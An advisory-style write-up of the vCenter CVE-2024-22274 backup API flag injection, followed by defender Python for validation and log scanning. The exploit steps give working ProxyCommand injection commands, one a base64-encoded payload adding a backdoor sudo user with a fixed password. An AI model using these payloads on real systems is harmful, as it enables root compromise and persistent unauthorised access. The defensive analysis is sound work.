CVE-2024-22274 is a critical vulnerability in VMware vCenter Server version 8.0.0.10200 that allows authenticated remote code execution. It is particularly severe because it can be exploited to gain root access to the target system.
Affected Software: VMware vCenter 8.0.0.10200
Underlying OS: Photon Linux

The vulnerability resides in the following API components:

- com.vmware.appliance.recovery.backup.job.create
- com.vmware.appliance.recovery.backup.validate

These components are susceptible to a flag injection attack: values supplied to the API are passed into system commands it executes, where they are parsed as command-line flags. This allows an attacker to run arbitrary commands as the root user.
Steps to Exploit the Vulnerability

1. Log in to vCenter Server: use SSH to log in as a user with the "admin" role.

2. Identify vulnerable commands: use a tool such as pspy to inspect the system commands executed by the vulnerable API components.

3. Flag injection: inject a malicious SSH flag through the --locationUser (username) field of the backup.validate command. For example:

    backup.validate --parts common --locationType SFTP --location nowhere --locationUser '-o ProxyCommand=;/bin/touch /tmp/root!!! 2>' --locationPassword

   This command creates the file /tmp/root!!! owned by the root user, demonstrating the ability to execute commands with root privileges.

4. Create a new user with root access: exploit the vulnerability to create a new user with SSH access and root privileges:

    backup.validate --parts common --locationType SFTP --location nowhere --locationUser '-o ProxyCommand=;/bin/bash -c "{echo,dXNlcmFkZCBtYWxaICYmIGVjaG8gLWUgIk1hbElzSGVyZTEjXG5NYWxJc0hlcmUxIyIgfCBwYXNzd2QgbWFsWiA7IHVzZXJtb2QgLXMgL2Jpbi9iYXNoIG1hbFogJiYgdXNlcm1vZCAtYUcgc3VkbyBtYWxaCg==}|{base64,-d}|bash" 2>' --locationPassword

   The command above decodes and executes a base64-encoded payload that creates a new user malZ with the password MalIsHere1# and adds this user to the sudo group.
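The root cause in both steps above is the same: a username field reaches ssh/sftp in an argv position where a value beginning with "-" is parsed as an option, and "-o ProxyCommand=..." makes the client run a local command. The following is an added defender-side example, not VMware's code or the page's own: it models the --locationUser and --location inputs with an allowlist validator that rejects option-looking values, a scanner that flags requests carrying such values in constructed sample log lines (the line format is invented; vCenter's real logs differ), and an argv builder that never hands the value to a shell. The allowlist patterns and option names are assumptions for this example.

```python
"""
Defender-side checks for the flag-injection pattern behind CVE-2024-22274.
Added example, not VMware's code: models the --locationUser / --location
inputs of the backup API and shows (1) an allowlist validator that rejects
option-looking values, (2) a log scanner that flags requests carrying
injected ssh options, (3) argv construction that never involves a shell.
"""
import re

# Assumed allowlists for this example; tighten to your environment.
SAFE_USER_RE = re.compile(r"^[a-z_][a-z0-9_.-]{0,31}$")
SAFE_HOST_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]*$")

# ssh/sftp options that make the client run a local command.
LOCAL_EXEC_OPTIONS = ("ProxyCommand", "LocalCommand", "PermitLocalCommand")
SHELL_METACHARS = set(";|&`$<>(){}\n")


def validate_location_user(value):
    """Return the reasons a username value is unsafe; an empty list means it passed."""
    reasons = []
    if value.startswith("-"):
        reasons.append("leading '-' would be parsed as an ssh/sftp option")
    if any(opt in value for opt in LOCAL_EXEC_OPTIONS):
        reasons.append("names an ssh option that executes a local command")
    if any(ch in SHELL_METACHARS for ch in value):
        reasons.append("contains shell metacharacters")
    if not SAFE_USER_RE.match(value):
        reasons.append("does not match the username allowlist")
    return reasons


def build_sftp_argv(user, host, remote_dir):
    """Build an argv list for sftp, refusing any value that fails validation.

    Passing a list (never a shell string) means no shell parses the username,
    and the allowlist ensures it cannot be mistaken for an option.
    """
    problems = validate_location_user(user)
    if not SAFE_HOST_RE.match(host):
        problems.append("host does not match the hostname allowlist")
    if problems:
        raise ValueError("refusing backup target: " + "; ".join(problems))
    return ["sftp", "-o", "BatchMode=yes", "%s@%s:%s" % (user, host, remote_dir)]


# Constructed sample request lines (format invented for this example; the
# real vCenter logs differ). Line 2 mirrors the payload shape from the page.
SAMPLE_LOG = [
    "backup.validate locationType=SFTP location=bk.example.com locationUser=backup",
    "backup.validate locationType=SFTP location=nowhere "
    "locationUser='-o ProxyCommand=;/bin/touch /tmp/root!!! 2>'",
    "backup.job.create locationType=SFTP location=bk.example.com locationUser=svc_backup",
]

# Extract the locationUser value, quoted or bare.
LOCATION_USER_RE = re.compile(r"locationUser=('[^']*'|\"[^\"]*\"|\S+)")


def scan_log(lines):
    """Return (line_number, value, reasons) for every request whose username looks injected."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = LOCATION_USER_RE.search(line)
        if not match:
            continue
        value = match.group(1).strip("'\"")
        reasons = validate_location_user(value)
        if reasons:
            hits.append((number, value, reasons))
    return hits


if __name__ == "__main__":
    for number, value, reasons in scan_log(SAMPLE_LOG):
        print("line %d: suspicious locationUser %r" % (number, value))
        for reason in reasons:
            print("  -", reason)
    print(build_sftp_argv("backup", "bk.example.com", "/backups"))
```

Running the module reports line 2 of the constructed log with all four reasons, and prints the argv list for the legitimate target. The same validator can sit in front of any code path that forwards an API field into a command line; the general rule it enforces is that user-controlled data must never occupy an argv slot where a leading "-" is meaningful, and must never pass through a shell.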